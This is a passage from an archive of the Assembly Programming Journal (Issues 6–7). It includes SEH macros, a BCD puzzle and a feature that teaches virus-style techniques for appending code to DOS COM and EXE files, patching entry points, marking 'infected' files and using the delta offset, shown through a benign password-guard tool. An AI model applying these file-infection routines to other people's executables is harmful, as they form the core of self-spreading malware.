; LOCAL MACROS
;###########################################################################
szText MACRO Name, Text:VARARG
LOCAL lbl
JMP lbl
Name DB Text,0
lbl:
ENDM
m2m MACRO M1, M2
PUSH M2
POP M1
ENDM
return MACRO arg
MOV EAX, arg
RET
ENDM
RGB MACRO red, green, blue
XOR EAX,EAX
MOV AH,blue
SHL EAX,8
MOV AH,green
MOV AL,red
ENDM
hWrite MACRO handle, buffer, size
MOV EDI, handle
ADD EDI, Dest_index
MOV ECX, 0
MOV CX, size
ADD Dest_index, ECX
MOV ESI, buffer
movsb
ENDM
hRead MACRO handle, buffer, size
MOV EDI, handle
ADD EDI, Spot
MOV ECX, 0
MOV CX, size
ADD Spot, ECX
MOV ESI, buffer
movsb
ENDM
;##############################################################################
; Variables we want to use in other modules
;##############################################################################
;##############################################################################
; External variables
;##############################################################################
;##############################################################################
; BEGIN INITIALIZED DATA
;##############################################################################
.DATA
;##############################################################################
; BEGIN CONSTANTS
;##############################################################################
;##############################################################################
; BEGIN EQUATES
;##############################################################################
;=================
;Utility Equates
;=================
FALSE EQU 0
TRUE EQU 1
;##############################################################################
; BEGIN THE CODE SECTION
;##############################################################################
.CODE
start:
;########################################################################
; WinMain Function
;########################################################################
;########################################################################
; End of WinMain Procedure
;########################################################################
;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################
;########################################################################
; End of Main Windows Callback Procedure
;########################################################################
;========================================================================
; THE GAME PROCEDURES
;========================================================================
;########################################################################
; Game_Init Procedure
;########################################################################
;########################################################################
; END Game_Init
;########################################################################
;########################################################################
; Game_Main Procedure
;########################################################################
;########################################################################
; END Game_Main
;########################################################################
;########################################################################
; Game_Shutdown Procedure
;########################################################################
;########################################################################
; END Game_Shutdown
;########################################################################
;######################################
; THIS IS THE END OF THE PROGRAM CODE #
;######################################
END start
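Of the macros in the framework above, RGB is the one whose result is least
obvious from reading it. The sketch below steps through the same five
instructions in Python to show the value left in EAX. It assumes each
component is already in the range 0-255, and rgb_macro is just a name chosen
for this illustration.

```python
def rgb_macro(red, green, blue):
    """Follow the RGB macro instruction by instruction; returns the final EAX."""
    eax = 0                                   # XOR EAX,EAX
    eax = (eax & 0xFFFF00FF) | (blue << 8)    # MOV AH,blue
    eax = (eax << 8) & 0xFFFFFFFF             # SHL EAX,8
    eax = (eax & 0xFFFF00FF) | (green << 8)   # MOV AH,green
    eax = (eax & 0xFFFFFF00) | red            # MOV AL,red
    return eax

color = rgb_macro(0x11, 0x22, 0x33)
```

The result has blue in bits 16-23, green in bits 8-15 and red in the low
byte, which is the 00BBGGRRh layout that Win32 uses for a COLORREF.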
Well, this is the end of the first article. The good news is all of the dry
boring stuff is behind us. The bad news is you won't get to see any code
until I complete the next article. In the meantime I would suggest brushing
up on your assembly language and maybe searching on the Internet for some
references on Win32 assembly language. You can find links to a lot of Win32
ASM resources at my website:
http://www.fastsoftware.com.
Researching more information isn't a must ... but for those of you that
still think this might be difficult, I would suggest taking the time to do
so. It isn't like you will be hindered by learning more. You may find
another resource that helps you learn this stuff and that is ALWAYS a good
thing.
In the next article we will get a skeleton version of SPACE-TRIS up and
running along with coding our Direct Draw library functions. The goal is to
get a bitmap up onto the screen and I think we can accomplish it next time.
If everything goes as planned, you should see the work starting to pay off
in a loading game screen. I know it doesn't sound like much ... but
appreciate how slowly we are progressing before we get further along.
Because once we have the basics down, we are going to pull out all of the
stops and then you will be thankful we took the extra time to cover this
stuff.
So young grasshoppers, until next time ... happy coding.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
SEH.INC
by X-Calibre
;Summary: Macros for Structured Exception Handling
;Compatibility: MASM, Win32
;Notes: Demonstration code contained in SEH.ASM, below
IFNDEF RaiseException
RaiseException PROTO STDCALL dwExceptionCode:DWORD, \
                             dwExceptionFlags:DWORD, \
                             nNumberOfArguments:DWORD, \
                             lpArguments:PTR DWORD
ENDIF
includelib kernel32.lib
TRY MACRO
PUSHCONTEXT ASSUMES
assume fs:nothing
; Install exception handler
push @@handler
push dword ptr fs:[0]
mov fs:[0], esp
POPCONTEXT ASSUMES
ENDM
CATCH MACRO exception
LOCAL @@invokeHandler
jmp @@removeHandler
@@handler:
IFNB <exception>
mov eax, [esp+4]
cmp dword ptr [eax], exception
je @@invokeHandler
mov eax, 1
ret
@@invokeHandler:
ENDIF
ENDM
ENDC MACRO
PUSHCONTEXT ASSUMES
assume fs:nothing
; Restore state
mov esp, dword ptr fs:[0]
mov esp, [esp]
@@removeHandler:
pop fs:[0]
add esp, 4
POPCONTEXT ASSUMES
ENDM
FINALLY MACRO
@@handler:
ENDM
ENDF MACRO
LOCAL @@removeHandler
PUSHCONTEXT ASSUMES
assume fs:nothing
; Restore state
cmp esp, dword ptr fs:[0]
je @@removeHandler
mov esp, dword ptr fs:[0]
mov esp, [esp]
@@removeHandler:
pop fs:[0]
add esp, 4
POPCONTEXT ASSUMES
ENDM
THROW MACRO exception
INVOKE RaiseException, exception, 0, 0, NULL
ENDM
; ---- flags ---
EXCEPTION_INT_DIVIDE_BY_ZERO equ 0C0000094h
SEH.ASM
by X-Calibre
;Summary: Sample program for using SEH.INC
;Compatibility: MASM, Win32
.386
.Model Flat, StdCall
include windows.inc
include user32.inc
include SEH.inc
includelib user32.lib
.code
tst PROC
THROW 0E0000001h
ret
tst ENDP
start:
main PROC
TRY
sub edx, edx
mov ecx, 0
idiv ecx
CATCH(EXCEPTION_INT_DIVIDE_BY_ZERO)
.data
exceptionMsg BYTE "Exception occurred",0
.code
INVOKE MessageBox, NULL, ADDR exceptionMsg, ADDR exceptionMsg, MB_OK
ENDC
main ENDP
blah PROC
TRY
call tst
FINALLY
.data
finallyMsg BYTE "In FINALLY-block",0
.code
INVOKE MessageBox, NULL, ADDR finallyMsg, ADDR finallyMsg, MB_OK
ENDF
blah ENDP
.data
finishMsg BYTE "Program finished",0
.code
INVOKE MessageBox, NULL, ADDR finishMsg, ADDR finishMsg, MB_OK
ret
end start
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
by Angel Tsankov
Challenge
---------
Write the shortest possible program to convert a two-digit BCD number to
hexadecimal; that is, the decimal representation of the output must equal
the hexadecimal representation of the input. For example, the input 42h must
produce the output 2Ah, which is 42 in decimal.
Solution
--------
The solution, in 14 bytes:
;Input  AL = (A * 16) + B
;Output AL = (A * 10) + B
88 C4       MOV AH, AL      ;AH = AL
82 E4 F0    AND AH, 0F0h    ;AH = (A * 16)
D0 EC       SHR AH, 1       ;AH = (A * 8)
28 E0       SUB AL, AH      ;AL = (A * 8) + B
C0 EC 02    SHR AH, 2       ;AH = (A * 2)
00 E0       ADD AL, AH      ;AL = (A * 10) + B
Submitted by Angel Tsankov <fn42551@...>.
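The arithmetic in the comments can be checked without an assembler. The
following Python sketch mirrors the six instructions one for one, keeping AL
and AH as 8-bit values; bcd_to_binary is a name chosen for this
illustration, not part of the submission.

```python
def bcd_to_binary(al):
    """Mirror the six-instruction solution, keeping AL and AH to 8 bits."""
    ah = al                   # MOV AH, AL
    ah &= 0xF0                # AND AH, 0F0h  -> A * 16
    ah >>= 1                  # SHR AH, 1     -> A * 8
    al = (al - ah) & 0xFF     # SUB AL, AH    -> A * 8 + B
    ah >>= 2                  # SHR AH, 2     -> A * 2
    al = (al + ah) & 0xFF     # ADD AL, AH    -> A * 10 + B
    return al

# Try every valid two-digit BCD input, 00h through 99h.
results = {(a << 4) | b: bcd_to_binary((a << 4) | b)
           for a in range(10) for b in range(10)}
```

The trick is that A * 16 - A * 8 + A * 2 = A * 10, so no multiply is needed.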
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Dec 99-Feb 00
:::\_____\::::::::::. Issue 7
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.com asmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"Extending DOS Executables"..........................Digital.Alchemist
"Creating a User-Friendly Interface"......................S.Sirajudeen
"ASM Building Blocks"...................................Laura.Fairhead
"Converting Strings to Numbers"...........................Chris.Dragan
"List Scan Library Routine".............................Laura.Fairhead
"Using the RTC"..........................................Jan.Verhoeven
"Chaos Animation".......................................Laura.Fairhead
"Inline Assembler With Modula"...........................Jan.Verhoeven
"Assembly on the Alpha Platform"........................Rudolf.Seemann
Column: Win32 Assembly Programming
"Direct Draw Samples"....................................X-Calibre
Column: The Unix World
"Enter fbcon".................................Konstantin.Boldyshev
Column: Assembly Language Snippets
"ToHex".....................................................Ronald
"Hex2ASCII"................................................cpuburn
"MMX ltostr".....................................Cecchinel.Stephan
Column: Issue Solution
"ScreenDump"........................................Laura.Fairhead
----------------------------------------------------------------------
+++++++++++++++++++Issue Challenge++++++++++++++++++
Dump the contents of the current console to a file
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by mammon_
What? Late again? Wasn't there going to be a December issue?
Well, yeah, there was; unfortunately once again real-world concerns
interfered with timely distribution. And, as usually happens with late
issues, this one is waaaaay oversized, almost 200K due to all the articles I
crammed into it. I didn't even get a chance to include my linux kernel
modules article...
This issue seems to have a bit of a 'Hex-to-ASCII' bent to it, mostly from
the snippets but also from the conversion routines offered by Chris and
Laura. In addition, some 'fringe' asm has been supplied with Jan's Modula
article, along with an introduction to Alpha assembly language by Rudolf
Seemann. Konstantin Boldyshev, who helps maintain the linuxassembly.org
site, continues the Unix trend with an introduction to frame-buffer
programming under linux.
The two leading articles are both quite large and offer a wealth of
information for the beginning and experienced asm programmer. Digital
Alchemist has produced a work on applying virus techniques to
non-destructive applications, and S. Sirajudeen has tackled the huge problem
of creating a decent UI in console-mode programs.
In this issue I have tried to leave the code comments as untouched as
possible; the coding styles of the authors vary quite widely, and each
clearly demonstrates the planning behind the program itself -- showing how
the algorithm was conceived before implementation. Stripping any of these
examples of all but comments will soon reveal the worksheet used by the
coders to develop their programs.
Finally, I have taken to formatting these issues in Vim under linux; to
check margins and pagination I have begun proofing them in Netscape and
WordPerfect [10 pt Courier, natch]; they should view fine in any web browser
and in most word processors; to those stuck with Notepad or Edit.com ... my
apologies.
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Extending DOS Executables
by Digital Alchemist
The reason behind this essay is to show how techniques first developed by
virus writers can be used for benevolent purposes. It is my opinion that all
knowledge is good and viral techniques are certainly no exception. I will
lead you through the development of a program called DOSGUARD which benignly
modifies DOS executables, both COM and EXE.
DESCRIPTION OF DOSGUARD
-----------------------
DOSGUARD is a DOS COM program which I developed in order to restrict access
to certain programs on my computer. DOSGUARD modifies all of the COM and EXE
files in the current directory, adding code to each one that requires the
user to correctly enter a password before running the original program.
DOSGUARD, while sufficient for this article, could use a little work in the
realm of user friendliness. More user feedback and a better way to specify
which files are to be modified are needed. In addition, I have written a
version of DOSGUARD that uses simple xor encryption to improve security.
DOSGUARD was written using Turbo Assembler.
STRUCTURE OF COM FILES
----------------------
Unlike the EXE file format, the programmer has no input into the segment
format of COM files. All COM files consist of 1 segment only, with no
predefined distinction between data and code. After DOS finishes some
preparatory work, the COM file is loaded at offset 100h. The first 256 bytes
are known as the Program Segment Prefix (PSP). Located at offset 80h is an
important data structure called the DTA or Data Transfer Area. The DTA is
important, but most of the rest of the PSP can be ignored by the programmer.
Before actually starting execution of the COM program, DOS sets up the stack
at the top of the segment (the highest memory address).
OUTLINE OF COM MODIFICATION
---------------------------
1. Open the file and read the first 5 bytes.
2. Make sure the file is not really an EXE file, because after DOS 6.0 some
   files ending in ".com" were really EXEs.
3. Check to see if the file has already been modified by DOSGUARD by
   checking if the values of the 4th and 5th bytes match the DOSGUARD
   identification string of "CG".
4. Make sure the file is not so large that adding DOSGUARD's code would make
   it exceed the 64k segment size.
5. If the file passes 2-4 then it's OK to modify, so DOSGUARD opens it and
   writes the code to the end of the file.
6. Calculate the size of the jump to the code we added and write the jump
   instruction along with the identification string to the beginning of the
   file.
I'll go over each of these steps in a little more detail with code snippets
where necessary. The complete source code for DOSGUARD can be found at the
end of the article and at my web page. Hopefully, the comments will be
enough to explain any areas I don't discuss in detail.
Essentially, the way DOSGUARD modifies COM files is by inserting a jump at
the beginning of the file which goes straight to the password authentication
code, located at the end of the file. If the correct password is entered by
the user, then it will restore the 5 bytes that were overwritten by the jump
and the identification string and execute the program just like DOSGUARD was
never there.
COM MODIFICATION - STEP 1
-------------------------
Once we've found a COM file, the first thing to do is open it. Then, after
running some tests on the file, we can determine if it is suitable for
modification. But first, we need to read the first 5 bytes because we'll
need them later.
mov ax, 3D02h ;Open file R/W
mov dx, 9Eh ;Filename, stored in DTA
int 21h
mov bx, ax ;Save file handle in bx
mov ax, 3F00h ;Read first 5 bytes from file
mov cx, 5
mov dx, offset obytes
int 21h
COM MODIFICATION - STEP 2
-------------------------
After DOS 6.0, some files with the COM extension are actually EXEs.
COMMAND.COM, for instance, is one of these. If we try to modify an EXE file
as if it were a COM file, then we're going to really screw things up. To
prevent this, we make sure that the string "MZ" doesn't appear in the first
two bytes of the file. "MZ" is the string which tells DOS that a file is an
EXE.
;Check to see if file is really an EXE
cmp word ptr[obytes], 'ZM'
je EXE
COM MODIFICATION - STEP 3
-------------------------
If the file had been previously altered by DOSGUARD, then the 4th and 5th
bytes will contain the identification string "CG". We need to make sure we
skip files that have this identification string.
;Check to see if file is already infected
;if it is, then skip it
cmp word ptr [obytes + 3], 'GC'
je NO_INFECT
COM MODIFICATION - STEP 4
-------------------------
Another thing to watch out for is the file's size. If the file will exceed
one segment in size when we add our code, then the file is too big to
modify.
;Make sure file isn't too large
mov ax, ds:[009Ah] ;Size of file from DTA
add ax, offset ENDGUARD - offset COMGUARD + 100h
jc NO_INFECT ;If ax overflows then don't infect
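Steps 2 through 4 boil down to three tests on the first five bytes and the
file size. The sketch below restates them in Python as a rough model.
The function name and the guard_size parameter (standing in for
offset ENDGUARD - offset COMGUARD) are assumptions made for this example.

```python
import struct

SEGMENT_LIMIT = 0x10000   # a COM program must fit in one 64k segment
PSP_SIZE = 0x100          # the file is loaded after the 256-byte PSP

def com_can_be_modified(first5, file_size, guard_size):
    """Return True if a COM file passes checks 2-4 of the outline."""
    # 'ZM' in the cmp is the little-endian word for the bytes 'M','Z' on disk.
    (word0,) = struct.unpack_from("<H", first5, 0)
    if word0 == 0x5A4D:                  # file starts with "MZ": really an EXE
        return False
    if first5[3:5] == b"CG":             # already carries the DOSGUARD mark
        return False
    # Mirrors 'add ax, size + 100h' followed by 'jc': reject on 16-bit overflow.
    if file_size + guard_size + PSP_SIZE >= SEGMENT_LIMIT:
        return False
    return True

plain_com = b"\xB4\x09\xBA\x0B\x01"      # made-up first bytes of an ordinary COM
ok = com_can_be_modified(plain_com, 1000, 300)
```

Note the byte order: x86 stores words low byte first, so the two-character
constants in the assembly comparisons appear reversed ('ZM' for "MZ", 'GC'
for "CG").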
COM MODIFICATION - STEP 5
-------------------------
If the file is a suitable candidate for modification, then we simply write
our code to the end of the file. Also, we have to save the original first 5
bytes from the file somewhere in our code. In DOSGUARD's case, the 5 bytes
are already saved in the proper place because "obytes" is located within the
code which we are about to write.
xor cx, cx ;cx = 0
xor dx, dx ;dx = 0
mov ax, 4202h ;Move file pointer to the end of file
int 21h
mov ax, 4000h ;Write the code to the end of file
mov dx, offset COMGUARD
mov cx, offset ENDGUARD - offset COMGUARD
int 21h
COM MODIFICATION - STEP 6
-------------------------
The final step is to calculate the size of the jump to our code and write
the opcode for the jump and the identification string over the first 5 bytes
of the file.
mov ax, 4200h ;Move file pointer to beginning of
xor cx, cx ; file to write jump
xor dx, dx
int 21h
;Prepare the jump instruction to be written to beginning of file
xor ax, ax
mov byte ptr [bytes], 0E9h ;opcode for jmp
mov ax, ds:[009Ah] ;size of the file
sub ax, 3 ;size of the jump instruction
mov word ptr [bytes + 1], ax;size of the jump
;Write the jump
mov cx, 5 ;size to be written
mov dx, offset bytes
mov ax, 4000h
int 21h
mov ah, 3Eh ;Close file
int 21h
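The "sub ax, 3" deserves a second look. A near jump (opcode E9h) takes a
16-bit displacement measured from the end of the 3-byte instruction, and the
added code begins where the host file used to end. The Python sketch below
builds the same 5 bytes. build_com_header is a hypothetical helper, and it
assumes the identification string "CG" occupies bytes 4 and 5 as described
in step 3.

```python
import struct

def build_com_header(file_size):
    """Return the 5 bytes written over the start of the host COM file."""
    # The jump sits at offset 100h and ends at 103h; its target is
    # 100h + file_size, so the displacement is file_size - 3.
    displacement = (file_size - 3) & 0xFFFF
    return struct.pack("<BH", 0xE9, displacement) + b"CG"

header = build_com_header(0x200)

# Where the CPU lands: address after the jump plus the displacement.
(disp,) = struct.unpack_from("<H", header, 1)
target = (0x103 + disp) & 0xFFFF
```

For a 200h-byte host the jump lands at 300h, the first byte past the
original program once it is loaded at 100h.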
RESPONSIBILITIES OF INSERTED CODE
--------------------------------
There are two problems which the inserted code has to deal with. First,
since the code could be located at any arbitrary offset within the segment,
it cannot depend on the compiled absolute addresses of its data labels. To
solve this problem we use a technique virus writers call the delta offset.
The delta offset is the difference between the actual and compiled addresses
of data. Anytime our code accesses data in memory it adds the delta offset
to the data's compiled address. The following piece of code finds the delta
offset.
call GET_START
GET_START:
pop bp
sub bp, offset GET_START
The "call" pushes the current ip onto the stack, which is the actual address
of the label "GET_START." Subtract the compiled address from the actual one
and there's our delta offset.
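A worked example may help here. The numbers below are invented for
illustration: they assume COMGUARD was assembled at offset 0150h, with
GET_START at 0153h and obytes at 0180h, and that the host file is 1000h
bytes long. The Python sketch just does the 16-bit arithmetic.

```python
def delta_offset(runtime_ip_after_call, compiled_offset_of_label):
    """pop bp / sub bp, offset GET_START, in 16-bit arithmetic."""
    return (runtime_ip_after_call - compiled_offset_of_label) & 0xFFFF

def runtime_address(compiled_offset, delta):
    """The address reached by adding the delta to a compiled offset."""
    return (compiled_offset + delta) & 0xFFFF

COMPILED_COMGUARD = 0x0150    # hypothetical offsets inside DOSGUARD itself
COMPILED_GET_START = 0x0153
COMPILED_OBYTES = 0x0180

host_size = 0x1000
runtime_comguard = 0x100 + host_size      # code appended after the host
runtime_get_start = runtime_comguard + (COMPILED_GET_START - COMPILED_COMGUARD)

delta = delta_offset(runtime_get_start, COMPILED_GET_START)
obytes_at_runtime = runtime_address(COMPILED_OBYTES, delta)
```

With these numbers the delta is 0FB0h, and obytes is found at 1130h, which
is 30h bytes into the appended code, exactly where it sat relative to
COMGUARD when assembled.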
The second problem is to make sure the first 5 bytes of the host are
restored to their original values before we return from our jump and execute
the host.
STRUCTURE OF EXE FILES
----------------------
The EXE file format is much more complicated than the COM format. The big
difference is that EXE files allow the program to specify how it wants its
segments to be laid out in memory, allowing programs to exceed one 64k
segment in size. Most EXEs will have separate code, data, and stack
segments.
All of this information is stored in the EXE Header. Here's a brief rundown
of what the header looks like:
Offset  Size  Field
   0      2   Signature. Will always be 'MZ'.
   2      2   Last Page Size. Number of bytes used in the last page
              of the file.
   4      2   Page Count. Number of 512 byte pages in the file.
   6      2   Relocation Table Entries. Number of items in the
              relocation pointer table.
   8      2   Header Size. Size of header in paragraphs,
              including the relocation pointer table.
  10      2   Minalloc
  12      2   Maxalloc
  14      2   Initial Stack Segment.
  16      2   Initial Stack Pointer.
  18      2   Checksum. (Usually ignored)
  20      2   Initial Instruction Pointer
  22      2   Initial Code Segment
  24      2   Relocation Table Offset. Offset to the start of
              the relocation pointer table.
  26      2   Overlay Number. Primary executables (the ones we
              wish to modify) always have this set to zero.
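Since the header is simply fourteen little-endian 16-bit words, it can be
unpacked in one call. The Python sketch below does that for the 28 bytes in
the table. The field names are my own shorthand for the table entries, and
the sample header is made up for the example rather than taken from a real
program.

```python
import struct
from collections import namedtuple

ExeHeader = namedtuple("ExeHeader", [
    "signature", "last_page_size", "page_count", "reloc_entries",
    "header_paragraphs", "minalloc", "maxalloc", "initial_ss", "initial_sp",
    "checksum", "initial_ip", "initial_cs", "reloc_table_offset",
    "overlay_number",
])

def parse_exe_header(data):
    """Unpack the 28-byte header: fourteen little-endian 16-bit words."""
    return ExeHeader(*struct.unpack_from("<14H", data, 0))

# A made-up header for illustration only.
sample = struct.pack("<14H", 0x5A4D, 0x0090, 3, 0, 4, 0, 0xFFFF,
                     0, 0x00B8, 0, 0, 0, 0x001C, 0)
header = parse_exe_header(sample)
header_bytes = header.header_paragraphs * 16   # a paragraph is 16 bytes
```

Reading the fields by name (header.initial_cs, header.overlay_number and so
on) corresponds to the [exehead+22] and [exehead+26] accesses used in the
assembly.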
Following the EXE header is the relocation pointer table, with a variable
amount of blank space between the header and the start of the table. The
relocation table is a table of offsets. These offsets are combined with
starting segment values calculated by DOS to point to a word in memory where
the final segment address is written. Essentially, the relocation pointer
table is DOS's way to handle the dynamic placement of segments into physical
memory. This isn't a problem with COM files because there is only one
segment and the program isn't aware of anything else. Following the
relocation pointer table is another variable amount of reserved space and
finally the program body.
To successfully add code to an EXE file requires careful manipulation of the
EXE header and relocation pointer table.
OUTLINE OF EXE MODIFICATION
---------------------------
1. Open the file and read the first 2 bytes (DOSGUARD actually reads 5).
2. Check for EXE signature "MZ".
3. Read the EXE header.
4. Check the file for previous infection.
5. Make sure that the Overlay Number is 0.
6. Make sure the file is a DOS EXE.
7. If the file passes 2-6 then it is ok to modify. The first step is to
   check the relocation pointer table to see if there is room to add 2
   pointers. If there is room, then jump to step 9.
8. If there isn't enough room in the relocation pointer table, then
   DOSGUARD has to make room. It reads in the entire file after the
   relocation pointer table and writes it back out one paragraph higher in
   memory.
9. Save the original ss, sp, cs, and ip.
10. Adjust the file length to paragraph boundary.
11. Write code to the end of the file.
12. Adjust the EXE header to reflect the new starting segments and file
    size.
13. Write out the header.
14. Modify the relocation pointer table.
The easiest way to think about EXE modification is to imagine that we are
adding a complete COM program to the end of the file. Our code will occupy
its own segment located just after the host. This one segment will serve as
a code, data, and stack segment just like in a COM program. Instead of
inserting a jump to take us there, we will simply adjust the starting
segment values in the EXE header to point to our segment.
EXE MODIFICATION - STEP 1
-------------------------
The same as with COM files, except that the only bytes we actually need are
the first two. With EXE files we will use different methods for determining
previous modification (I try to avoid using the viral term "infection") and
for transferring execution to our code.
EXE MODIFICATION - STEP 2
-------------------------
Check the first two bytes for the EXE signature "MZ". If the file doesn't
start with "MZ," then it isn't a DOS EXE.
cmp word ptr[obytes], 'ZM'
je EXE
EXE MODIFICATION - STEP 3
-------------------------
Now, DOSGUARD simply reads the EXE header into a 28 byte buffer. Later, we
will make the necessary changes to the header and write it back out.
xor cx, cx ;Move the file pointer back
xor dx, dx ;to the beginning of the file
mov ax, 4200h
int 21h
mov cx, 1Ch ;read exe header (28 bytes)
mov dx, offset exehead ;into buffer
mov ah, 3Fh
int 21h
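As a reading aid for the steps that follow, here is a small Python sketch of the 28 byte header and the offsets the listings use (exehead+2, exehead+8, exehead+22 and so on). Python is only a convenient notation for checking the layout; the field names and both function names are my own labels and do not appear in DOSGUARD.

```python
import struct

# Offsets into the 28-byte EXE header, as used by the DOSGUARD listings.
# The field names are illustrative labels, not identifiers from DOSGUARD.
FIELDS = (
    "signature",       # +0   'MZ'
    "last_page_size",  # +2   bytes used in the last 512-byte page
    "num_pages",       # +4   file size in 512-byte pages
    "reloc_count",     # +6   entries in the relocation pointer table
    "header_paras",    # +8   header size in 16-byte paragraphs
    "min_alloc",       # +10
    "max_alloc",       # +12
    "init_ss",         # +14
    "init_sp",         # +16
    "checksum",        # +18
    "init_ip",         # +20
    "init_cs",         # +22
    "reloc_offset",    # +24  file offset of the relocation pointer table
    "overlay_number",  # +26
)

def parse_exe_header(raw):
    """Unpack the first 28 bytes of an EXE file into a dict of 16-bit fields."""
    if len(raw) < 28:
        raise ValueError("need at least 28 bytes")
    return dict(zip(FIELDS, struct.unpack("<14H", raw[:28])))

def is_dos_exe_candidate(header):
    """Signature, overlay and relocation-offset tests (Steps 2, 5 and 6)."""
    return (header["signature"] == 0x5A4D       # 'MZ' read as a little-endian word
            and header["overlay_number"] == 0
            and header["reloc_offset"] < 0x40)
```

The "already modified" test of Step 4 needs the file size as well, so it is left out of is_dos_exe_candidate.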
EXE MODIFICATION - STEP 4
-------------------------
We don't use a signature string to mark EXE files. Instead, we compare the
code entry point with the size of the file. If the file has been previously
modified by DOSGUARD, then we know that the distance of the code entry point
from the end of the file will be the length of the code that DOSGUARD adds.
To put things in mathematical terms:
(initial cs * 16) + (size of code DOSGUARD adds) + (size of header)
will equal the size of the file. The initial cs times 16 is the code entry
point, of course, since DOSGUARD always sets the initial ip to 0. You have
to add the header size because it isn't loaded into memory along with the
rest of the code and data.
;Make sure it hasn't already been infected
;If (initial CS * 16) + (size of code) + (size of header) == filesize
; then the file has already been infected
mov ax, word ptr [exehead+22]
mov dx, 16
mul dx
add ax, offset ENDGUARD2 - offset EXEGUARD
adc dx, 0
mov cx, word ptr [exehead+8]
add cx, cx
add cx, cx
add cx, cx
add cx, cx
add ax, cx
adc dx, 0
cmp ax, word ptr cs:[9Ah]
jne EXEOK
cmp dx, word ptr cs:[9Ch]
je NO_INFECT
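The same test can be written out in a few lines of Python to check the arithmetic by hand. This is only a sketch: the function name, GUARD_LEN (standing in for ENDGUARD2 - EXEGUARD) and the sample numbers are made up for illustration.

```python
def already_modified(init_cs, header_paras, guard_len, file_size):
    """Step 4 test: does the entry segment sit exactly guard_len bytes
    before the end of the file?"""
    return init_cs * 16 + guard_len + header_paras * 16 == file_size

# Hypothetical file: 512-byte header (32 paragraphs), host image padded to
# 0x1230 bytes, and a 300-byte guard module appended after it.
GUARD_LEN = 300
size = 32 * 16 + 0x1230 + GUARD_LEN

print(already_modified(0x123, 32, GUARD_LEN, size))   # True
print(already_modified(0x100, 32, GUARD_LEN, size))   # False
```

The first call models a file whose initial cs points at the appended module; the second models an untouched file whose entry segment lies somewhere inside the host.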
EXE MODIFICATION - STEP 5
-------------------------
Another simple test that needs to be done is to make sure that the Overlay
Number stored in the EXE header is 0. The code for this is simple.
;Make sure Overlay Number is 0
cmp word ptr [exehead+26], 0
jnz NO_INFECT
EXE MODIFICATION - STEP 6
-------------------------
This part is kind of tricky. There are lots of files out there with the EXE
extension that aren't DOS executables. Both Windows and OS/2 use this
extension as well, for instance. To complicate matters, there isn't an easy
way to automatically distinguish DOS EXEs from the others. The technique
that I use in DOSGUARD is to check the offset of the relocation pointer
table and make sure that it is less than 40h. This should always detect
Windows and OS/2 programs, but it sometimes raises false alarms on valid DOS
files.
;Make sure it is a DOS EXE (as opposed to windows or OS/2)
cmp word ptr [exehead+24], 40h
jae NO_INFECT
EXE MODIFICATION - STEP 7
-------------------------
Now that we know we have a file that we can modify, we just have to
determine if it's going to be easy to modify or a real pain. Here's the
deal. The header, which ends with the relocation pointer table, is always a
whole number of 16 byte paragraphs in size. Each pointer in the table is 4
bytes. For our purposes, we need to add 2 pointers to the table. That means
the table must have at least 8 bytes free in order to leave the header at
its current size. If it doesn't have room for two more pointers, then we
will have to make room. That means reading in the whole file after the table
and writing it back out with 16 bytes more space for the table.
To find out if there is enough room, all you have to do is subtract the
offset of the relocation pointer table and the space taken up by the entries
in the table from the size of the header. The result is the amount of free
space in the table. All of this information can be found in the handy dandy
EXE header. Of course, you have to take into account the units that each of
these values is stored in (bytes, paragraphs, etc.)
;Check the relocation pointer table to see if there is
;room. If there isn't then we'll have to make room.
mov ax, word ptr [exehead+8];size of header in paragraphs
add ax, ax ;
add ax, ax ;Convert to double words.
sub ax, word ptr [exehead+6];Subtract # of entries each of
add ax, ax ;which is a double word and then
add ax, ax ;convert the final total to bytes.
sub ax, word ptr [exehead+24];If there are 8 bytes left after
cmp ax, 8 ;you subtract the offset to the
jc NOROOM ;reloc table then there is room.
jmp HAVEROOM
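With every quantity converted to bytes, the check above comes down to one subtraction. A quick Python sketch with made-up header values (the function names are mine, and a well-formed header is assumed):

```python
def reloc_free_bytes(header_paras, reloc_count, reloc_offset):
    """Free bytes between the last relocation entry and the end of the header."""
    return header_paras * 16 - reloc_count * 4 - reloc_offset

def has_room_for_two(header_paras, reloc_count, reloc_offset):
    """True when two more 4-byte pointers fit without growing the header."""
    return reloc_free_bytes(header_paras, reloc_count, reloc_offset) >= 8

# 512-byte header, 5 entries, table at offset 1Ch: 512 - 20 - 28 bytes free.
print(reloc_free_bytes(32, 5, 0x1C))   # 464
# 32-byte header, 1 entry, table at offset 1Ch: 32 - 4 - 28 = 0 bytes free.
print(has_room_for_two(2, 1, 0x1C))    # False
```

The second case is the one that sends DOSGUARD to NOROOM.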
EXE MODIFICATION - STEP 8
-------------------------
The first thing to do is move the file pointer to the correct spot just
after the last entry in the relocation pointer table.
xor cx, cx ;Move the file pointer to the end of
mov dx, word ptr [exehead+24] ;the relocation pointer table.
mov ax, word ptr [exehead+6];size of relocation table in doubles
add ax, ax ;* 4 to get bytes
add ax, ax
add dx, ax ;add that to start of table
push dx
mov ax, 4200h
int 21h
Now, DOSGUARD calculates the amount which needs to be written. This code is
in the function called CALC_SIZE. When CALC_SIZE is finished, cx will hold
the number of pages and "lps" will hold the size of the last page since it
probably will not be a full 512 byte page.
;dx holds the position in the file where we want to start reading.
;So, the amount to read in and write back out is equal to the size
;of the file minus dx.
mov cx, word ptr [exehead+2]
